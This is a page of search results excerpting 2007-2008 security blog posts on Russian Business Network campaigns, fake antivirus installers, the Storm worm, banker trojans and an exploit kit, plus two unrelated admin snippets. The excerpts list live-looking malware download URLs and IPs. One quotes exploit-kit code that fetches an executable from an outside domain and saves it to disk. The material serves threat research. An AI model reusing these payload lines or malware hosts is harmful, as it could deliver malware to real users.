SEARCH RESULTS
 
Showing 1-10 of 49 records
 

HACKED BY THE RBN!

2008-04-01 15:52:09 in Dancho Danchev's Blog - Mind Streams of Information Security Knowledge
...executing the harmless to a VMware backed up PC setup files below, will not just strengthen our relationship by having your computer contact ours, but will also help us pay for the infrastructure we use to host these, and let us continue maintaining our 99% uptime even in times of negative attitude on a large scale against our business...
 
 
 
 
 

A Diverse Portfolio of Fake Security Software

2007-12-07 15:16:07 in Dancho Danchev's Blog - Mind Streams of Information Security Knowledge
...exe content.onerateld.com/avsystemcare.com/AVSystemCare/install en.exe content.onerateld.com/winsecureav.com/WinSecureAv/install en.exe content.onerateld.com/goldenantispy.com/GoldenAntiSpy/install en.exe content.onerateld.com/menacerescue.com/MenaceRescue/install en.exe content.onerateld.com/antispywaresuite.com/AntiSpywareSuite/install...
 
 
 
 
 

Storm-Bot stripshow analysis

2007-12-23 22:06:00 by Russ McRee in HolisticInfoSec.org
 
...exe (modified to protect the innocent) yields a hash of 2BBA62FBC3B9AF85C3C7D64A82E1237C. Once executed it immediately copies itself as disnisa.exe to C:\WINDOWS and adds a startup registry key for the same Current AV detection includes Kaspersky stripshow.exe - Email-Worm.Win32.Zhelatin.pd eTrust-Vet - Win32/Sintun.AT Microsoft -...
 
 
 
 
 

Execute in PowerShell

2007-12-02 11:27:00 by Keith Brown in Security Briefs
 
...exe -r but I didn't want to make any assumptions about what drive or directory Windows was installed in. What I wanted was something like this %WINDIR%\Microsoft.NET\Framework\v2.0.50727\aspnet_regiis.exe -r In PowerShell, an easy way to get the value of an environment variable is to use the $env namespace like so $env:windir but when I put this...
 
 
 
 
 

RBN's Fake Account Suspended Notices

2008-01-15 19:07:34 in Dancho Danchev's Blog - Mind Streams of Information Security Knowledge
...exe 88.255.94.250/s2/m.exe 88.255.94.250/s2/d.exe 88.255.94.250/s2/un.php And as I've already pointed out in a previous post, 88.255.94.250 is the New Media Malware Gang . Moreover, next to m.exe and d.exe with an over 50% detection rates, 200.exe is impressively detected by one anti virus vendor only Detection rate : 1/32 (3.13 File size :...
 
 
 
 
 

Malware Attack Exploiting Flash Zero Day Vulnerability

2008-05-27 17:33:43 by Dancho Danchev in Dancho Danchev's Blog - Mind Streams of Information Security Knowledge
...Execution Vulnerability . At count18.wuqing17173.cn/click.aspx.php (58.215.87.11) the end user is receiving a look looks like a 404 error message, however, within the 404 message there's a great deal of information exposing the exploits location and participation domains, which you can see attached in the screenshot above. In between several...
 
 
 
 
 

Turning on cruise control

2008-01-18 07:26:00 by Keith Brown in Security Briefs
 
...exe and ccservice.exe. These do exactly the same thing, only one runs from the command line and the other runs in the background as a service. When you log in as an administrator and run ccnet.exe it naturally runs very smoothly. And this is where I started, with a very simple project that downloads code from one of our Subversion...
 
 
 
 
 

A Localized Bankers Malware Campaign

2008-03-25 14:59:06 in Dancho Danchev's Blog - Mind Streams of Information Security Knowledge
...exe Scanners Result : 13/32 (40.62 TR/Spy.Banker.Gen; Trojan-Spy.Win32.Banker.JU File size : 3339776 bytes MD5: e00b1cd654b5b3fd5c8a1f5e71939a04 SHA1 : cc11a030e868ece65769e177616cbebfb239bee6 It's also interesting to note that this campaign's been aiming to stay beneath the radar, not just by localizing the campaign itself and distributing...
 
 
 
 
 

The Random JS Malware Exploitation Kit

2008-01-15 20:49:56 in Dancho Danchev's Blog - Mind Streams of Information Security Knowledge
...exe",5,1,"mosvs8"); } catch(OBJECT id=yah8 classid=clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F> try { yah8.GetFile( bunburyymas.com/odjiffkl","c:mosvs8.exe",5,1,"mosvs8"); } catch Copies of the malware obtained mosvs8.exe -- and logically submitted to each and every anti virus vendor on behalf of VirusTotal just like every sample I ever came...